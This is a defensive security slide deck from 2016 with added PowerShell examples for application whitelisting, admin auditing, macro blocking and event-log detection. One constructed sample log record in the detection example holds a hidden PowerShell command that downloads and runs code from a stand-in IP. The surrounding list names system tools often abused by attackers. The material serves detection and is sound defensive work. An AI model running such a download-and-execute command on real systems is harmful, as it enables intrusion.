BREAK I.T. DOWN: A look at computer network defense techniques and strategies that actually work in a world of blinky-light sales. Straight-up defense served with a side of sarcasm. Joshua Smith – 2016.07.19

Upload: ec-council

Post on 15-Apr-2017



ABOUT ME

THE GOAL

Discuss real-world defense techniques that make an attacker's job hard(er)

This does not mean it will be easy

It will be free (don't forget about the cost of time)

THE PROBLEM

It's 2016 and we still see headlines like this:

Noodles & Company Payment Data May Have Been Hacked

From high seas to high tech: Pirates hack shipping company

Hackers selling 117 million LinkedIn passwords

Troy investment company hacked; $495K stolen

Lone wolf claims responsibility for DNC hack

Canadian Gold-Mining Company Hacked, 14.8 GB Data Stolen

China steel firm obtained hacked DuPont trade secrets

HOW?

A macro-enabled document, pivot, profit, rinse and repeat

1995 produced the first macro-based malware

We are still fighting (and losing) a 20+ year old battle

20 YEARS I SAID

THE ISSUE

Defense is the daughter of offense: if you don't know an attacker's tradecraft you are going to have a hard time keeping them out

We are being sold: Machine Learning

Cyber

Next Gen

The Cloud

Etc.

IT’S MACROS TODAY, HOWEVER, JUST REMEMBER

Technical control, recommendation, and priority (1 = highest):

1. Application Whitelisting: Only approved applications should be allowed to run (this includes .exe, .dll, .js, .bat, etc.)

2. Patch 3rd Party Software: 3rd party software (Flash, Silverlight, Java, etc.) needs to be patched

3. Patch OS: OS patches properly distributed in a timely manner

4. Restrict Admin Privileges: Users should not be running with administrative rights

5. Host-based Intrusion Detection/Prevention System (HIDS/HIPS): Implement a HIDS/HIPS to identify when prevention has failed and a host has been successfully compromised

6. Network Segmentation: Network segmentation helps mitigate post-compromise pivoting (e.g., Pass-the-Hash and Pass-the-Ticket)

7. Web Application Firewall (WAF): Implement a WAF to help detect and prevent web-based attacks against external websites

8. Event Monitoring: Implement a monitored SIEM to gain visibility into your networks. Event sources include, but are not limited to, firewall, AV, Active Directory, hosts, IDS/IPS, and web logs

9. Office Document Threat Prevention: All .doc, .docm, .xls, and .xlsm documents should be blocked if possible at the email level and via Group Policy Objects (GPOs)

10. SSL Interception: SSL traffic should be intercepted (with exceptions) to identify malicious traffic, and filtered as well

APPLICATION WHITELISTING

Only approved applications are allowed to run

Free and paid-for options

AV is the inverse of this (blacklisting)

Not foolproof (see powershell.exe)

So when an unapproved program tries to run, it gets this:
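As an added example (not from the slides), here is what standing up that allow-list looks like on a Windows host with the built-in AppLocker tooling: inventory what is already installed, generate publisher/path rules, stage the policy in audit mode, and dry-run it against a few binaries before enforcing. The scratch paths and the two "untrusted" test files are constructed for this example; the cmdlets, enumeration values and event IDs are AppLocker's own.

```powershell
# Added example, not from the slides: build an AppLocker allow-list from what
# is already installed, stage it in audit mode, and dry-run it against a few
# binaries before enforcing. Needs an elevated Windows PowerShell session on an
# edition that ships the AppLocker module (Windows 10/11 Enterprise/Education,
# Windows Server). Recursing all of C:\Windows takes a few minutes.
Import-Module AppLocker

# 1. Inventory trusted install locations. Publisher rules are preferred because
#    they survive patching; unsigned files fall back to path rules.
$fileInfo = Get-AppLockerFileInformation -Directory 'C:\Program Files', 'C:\Program Files (x86)', 'C:\Windows' `
                                         -Recurse -FileType Exe, Dll, Script

$policyXml = New-AppLockerPolicy -FileInformation $fileInfo `
                                 -RuleType Publisher, Path `
                                 -User Everyone `
                                 -RuleNamePrefix Baseline `
                                 -Optimize -Xml

# 2. Start in AuditOnly so would-be blocks are only logged (event 8003 in
#    'Microsoft-Windows-AppLocker/EXE and DLL', 8006 in '/MSI and Script').
#    New-AppLockerPolicy emits EnforcementMode="NotConfigured"; flip it here.
$policyXml  = $policyXml -replace 'EnforcementMode="NotConfigured"', 'EnforcementMode="AuditOnly"'
$policyPath = Join-Path $env:TEMP 'applocker-baseline.xml'   # scratch location chosen for this example
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# 3. Dry-run. Two constructed "untrusted" files in a user-writable directory:
#    an unsigned .exe compiled on the spot and a .js dropper stand-in.
$unsignedExe = Join-Path $env:TEMP 'unsigned-demo.exe'
Add-Type -TypeDefinition 'class P { static void Main() { } }' -OutputAssembly $unsignedExe -OutputType ConsoleApplication
$dropperJs = Join-Path $env:TEMP 'dropper-demo.js'
Set-Content -Path $dropperJs -Value 'WScript.Echo("constructed test file");'

$samples = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\System32\mshta.exe",
    $unsignedExe,
    $dropperJs
)
Test-AppLockerPolicy -XmlPolicy $policyPath -Path $samples -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# 4. When the audit log is clean, enforce: merge into any existing policy and
#    make sure the Application Identity service runs, or AppLocker does nothing.
# Set-AppLockerPolicy -XmlPolicy $policyPath -Merge
# sc.exe config appidsvc start= auto
# sc.exe start appidsvc
```

The dry-run is the check worth doing before every rollout: files that match no rule in a collection that has rules are denied by default, while powershell.exe and mshta.exe are Microsoft-signed and live under C:\Windows, so the baseline rules cover them. That is the "not foolproof (see powershell.exe)" caveat from the slide; those binaries need explicit deny rules or separate constraints, whitelisting alone does not stop them.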

PATCH 3RD PARTY SOFTWARE

Adobe Flash is currently the most exploited 3rd party software*

Other things like Adobe Reader, Microsoft Silverlight

*This title used to belong to Oracle/Sun Java, but that is no longer the case

PATCH OS

Patching matters, even on Linux and embedded devices

Remote exploits get all the press, but privilege escalation is what we typically exploit (if any exploits are used at all)

RESTRICT ADMINISTRATOR PRIVS

Don’t let users run as administrators*

Why? Pivoting, passwords, persistence

* Yes, I know that this can be very hard
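Before you can take admin rights away you need to know who has them. The script below is an added example (not from the slides) that pulls the local Administrators membership from a set of workstations and flags anything not on an approved list. It assumes Windows PowerShell 5.1 (for Get-LocalGroupMember) and WinRM access to the targets; the host names and the approved-group names are placeholders for this example.

```powershell
# Added example, not from the slides: report every member of the local
# Administrators group on a set of workstations and flag the ones that are not
# on an approved list. Assumes Windows PowerShell 5.1 (Get-LocalGroupMember)
# and WinRM access to the targets. The approved names are placeholders.
function Get-UnapprovedLocalAdmins {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [string[]]$Approved = @('Administrator', 'Domain Admins', 'Workstation Admins')  # hypothetical list
    )
    $members = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Get-LocalGroupMember -Group 'Administrators' |
            Select-Object @{ n = 'Computer'; e = { $env:COMPUTERNAME } },
                          Name, ObjectClass, PrincipalSource
    }
    # Name is 'DOMAIN\account' or 'HOST\account'; compare on the account part.
    $members | Where-Object { ($_.Name -split '\\')[-1] -notin $Approved } |
        Select-Object Computer, Name, ObjectClass, PrincipalSource
}

# Every hit is a standing admin the slide is telling you to remove: a domain
# user added "temporarily", a shared helpdesk account, a vendor service account.
Get-UnapprovedLocalAdmins -ComputerName 'WS01', 'WS02' | Format-Table -AutoSize
```

Run it from a collector on a schedule and diff the output; a new unapproved entry is either a change-control failure or the "persistence" bullet above happening to you.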

HOST BASED IDS/IPS

So I just bypassed your next-gen firewall, IPS, and synergistic AV product to compromise a fully patched box.

DO YOU SEE ME PIVOTING AND EXFILTRATING ALL OF YOUR DATA OUT THE FRONT DOOR?

NO? ATTACKER BE LIKE...

TAKEAWAY

If you don’t remember anything else from this presentation remember this:

DON’T FORGET ABOUT DETECTION

Required Reading: https://ghostbin.com/paste/6kho7

NETWORK SEGMENTATION

You have your company's critical documents accessible from a machine that can look up Pokemon Go cheats?

WEB APPLICATION FIREWALL (WAF)

Website logs are often overlooked

Website attacks can be a forewarning of other things to come

EVENT MONITORING

Logs need to be collected *and* analyzed

Budgets often account for the cost of tools, not the time required to learn, monitor, and review those tools
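"Collected and analyzed" in practice: the macro-document-to-pivot chain from the HOW? slide shows up in Windows Security event 4688 (process creation) as an Office application spawning a shell or script host, provided "Audit Process Creation" and "Include command line in process creation events" are enabled by GPO. The following is an added example (not from the slides) that runs that detection over 4688 records. The three records are constructed for this example and trimmed to the fields the code reads; the field names and the event ID are the real ones.

```powershell
# Added example, not from the slides: the "macro-enabled document, pivot,
# profit" chain from the HOW? slide leaves a trace in Security event 4688
# (process creation) once "Audit Process Creation" and "Include command line in
# process creation events" are enabled by GPO. This flags Office applications
# spawning shells or script hosts. ParentProcessName is only present in 4688 on
# Windows 10 / Server 2016 and later; older records are skipped.
$officeParents   = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE'
$suspectChildren = 'powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe',
                   'regsvr32.exe', 'rundll32.exe', 'certutil.exe', 'bitsadmin.exe', 'msiexec.exe'

function Find-OfficeChildProcess {
    # Takes the <Event> element of a 4688 record, i.e. ([xml]$rec.ToXml()).Event
    param([Parameter(ValueFromPipeline)][System.Xml.XmlElement]$Record)
    process {
        $data = @{}
        foreach ($d in $Record.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if (-not $data['ParentProcessName']) { return }   # pre-Windows 10 record, no parent info
        $parent = Split-Path -Leaf $data['ParentProcessName']
        $child  = Split-Path -Leaf $data['NewProcessName']
        if ($parent -in $officeParents -and $child -in $suspectChildren) {
            [pscustomobject]@{
                Time     = $Record.System.TimeCreated.SystemTime
                Computer = $Record.System.Computer
                User     = $data['SubjectUserName']
                Parent   = $parent
                Child    = $child
                Command  = $data['CommandLine']
            }
        }
    }
}

# Constructed sample records (same XML shape Get-WinEvent returns, trimmed to
# the fields used): one macro launching PowerShell, two benign Office events.
# 198.51.100.7 is a documentation-range address.
$sample = [xml]@'
<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <Event>
    <System><EventID>4688</EventID><TimeCreated SystemTime="2016-07-19T14:02:11Z"/><Computer>WS01</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">jsmith</Data>
      <Data Name="NewProcessName">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
      <Data Name="CommandLine">powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"</Data>
      <Data Name="ParentProcessName">C:\Program Files\Microsoft Office\Office16\WINWORD.EXE</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>4688</EventID><TimeCreated SystemTime="2016-07-19T14:01:58Z"/><Computer>WS01</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">jsmith</Data>
      <Data Name="NewProcessName">C:\Program Files\Microsoft Office\Office16\WINWORD.EXE</Data>
      <Data Name="CommandLine">"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\jsmith\Downloads\invoice.doc"</Data>
      <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
    </EventData>
  </Event>
  <Event>
    <System><EventID>4688</EventID><TimeCreated SystemTime="2016-07-19T14:05:40Z"/><Computer>WS01</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">jsmith</Data>
      <Data Name="NewProcessName">C:\Windows\splwow64.exe</Data>
      <Data Name="CommandLine">C:\Windows\splwow64.exe 12288</Data>
      <Data Name="ParentProcessName">C:\Program Files\Microsoft Office\Office16\WINWORD.EXE</Data>
    </EventData>
  </Event>
</Events>
'@
$sample.Events.Event | Find-OfficeChildProcess | Format-List

# Against the live Security log on a host, or a Windows Event Forwarding collector:
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 5000 |
#     ForEach-Object { ([xml]$_.ToXml()).Event } | Find-OfficeChildProcess
```

Only the first record is reported: Explorer launching Word and Word launching the print helper splwow64.exe are normal. The parent/child pairing is what makes this cheap and high-signal, and it is exactly the kind of rule that costs time rather than budget, which is the slide's point.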

OFFICE DOCUMENT THREAT PREVENTION

Disable macros

Can be done via GPOs
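For testing on a single workstation, or for auditing what a host actually ended up with, the following added example (not from the slides) sets and reads the registry values that the Office 2013 (15.0) and Office 2016 (16.0) Group Policy templates write for "VBA Macro Notification Settings" and "Block macros from running in Office files from the Internet". The value names and meanings are the real policy values; the Exchange transport rule at the end (for the "block at the email level" half of the recommendation) is a sketch that assumes the Exchange Management Shell.

```powershell
# Added example, not from the slides: the registry values that the Office 2013
# (15.0) and Office 2016 (16.0) Group Policy templates write under
# HKCU\Software\Policies. Setting them directly is handy for testing a single
# workstation before the GPO rolls out, and Get-OfficeMacroPolicy shows what a
# host actually ended up with. Because they live under \Policies they override
# whatever the user picks in the Trust Center.
$apps     = 'Word', 'Excel', 'PowerPoint'
$versions = '15.0', '16.0'

function Set-OfficeMacroPolicy {
    param(
        # VBAWarnings: 4 = disable all without notification (the slide's "disable macros"),
        # 3 = disable all except digitally signed, 2 = disable with notification (Office default),
        # 1 = enable all
        [ValidateRange(1, 4)][int]$VbaWarnings = 4
    )
    foreach ($v in $versions) {
        foreach ($app in $apps) {
            $key = "HKCU:\Software\Policies\Microsoft\Office\$v\$app\Security"
            New-Item -Path $key -Force | Out-Null
            New-ItemProperty -Path $key -Name 'VBAWarnings' -PropertyType DWord -Value $VbaWarnings -Force | Out-Null
            # "Block macros from running in Office files from the Internet": refuses macros in
            # any file carrying the Mark-of-the-Web (email attachments, browser downloads),
            # regardless of the VBAWarnings setting.
            New-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -PropertyType DWord -Value 1 -Force | Out-Null
        }
    }
}

function Get-OfficeMacroPolicy {
    foreach ($v in $versions) {
        foreach ($app in $apps) {
            $key = "HKCU:\Software\Policies\Microsoft\Office\$v\$app\Security"
            $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            [pscustomobject]@{
                App               = "$app $v"
                VBAWarnings       = $(if ($p) { $p.VBAWarnings } else { 'not set (user-controlled)' })
                BlockFromInternet = $(if ($p) { $p.blockcontentexecutionfrominternet } else { 'not set' })
            }
        }
    }
}

Set-OfficeMacroPolicy -VbaWarnings 4
Get-OfficeMacroPolicy | Format-Table -AutoSize

# The "block at the email level" half of the recommendation, for on-premises
# Exchange (run in the Exchange Management Shell, not a plain PowerShell prompt):
# New-TransportRule -Name 'Block macro-capable attachments' `
#     -AttachmentExtensionMatchesWords 'doc', 'docm', 'xls', 'xlsm' `
#     -RejectMessageReasonText 'Macro-capable Office attachments are not accepted'
```

If business units genuinely need macros, 3 (signed only) plus a code-signing process is the usual compromise; 2 is the default that got the headlines on the PROBLEM slide, because the user is one click from enabling content.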

SSL INSPECTION

About 50% of web traffic is now encrypted, including a lot of malicious traffic

A NOTE ABOUT “PEN TESTING”

There is a vast difference between:

Vulnerability Assessment

Penetration Test

Red Teaming/Adversary Simulation

Helpful when you believe you are secure or you need to grease the wheels to get more money

To reduce costs don't be afraid to white card (hand the testers a foothold or access instead of paying for them to earn it), but make sure that doesn't invalidate your test to the executives

SUMMARY

You probably can use a lot of what you already have to make security at your organization better

Don’t fall for the blinky lights, buzzword laden sales job

Cultural changes are hard and require management buy-in

Don’t tailor your defense to what security companies are selling, tailor to what attackers are attacking

Leverage red team engagements to get the support you need to make changes

Don’t forget about detection

Defense is hard, not impossible

REFERENCES

Infosec Reactions - https://securityreactions.tumblr.com/

ASD Strategies to Mitigate Targeted Cyber Intrusions - http://www.asd.gov.au/infosec/top-mitigations/mitigations-2014-table.htm

Application Whitelisting - http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-167.pdf

Disable Office Macros - https://medium.com/@networksecurity/it-s-time-to-secure-microsoft-office-be50ec2797e3#.x5ll30jza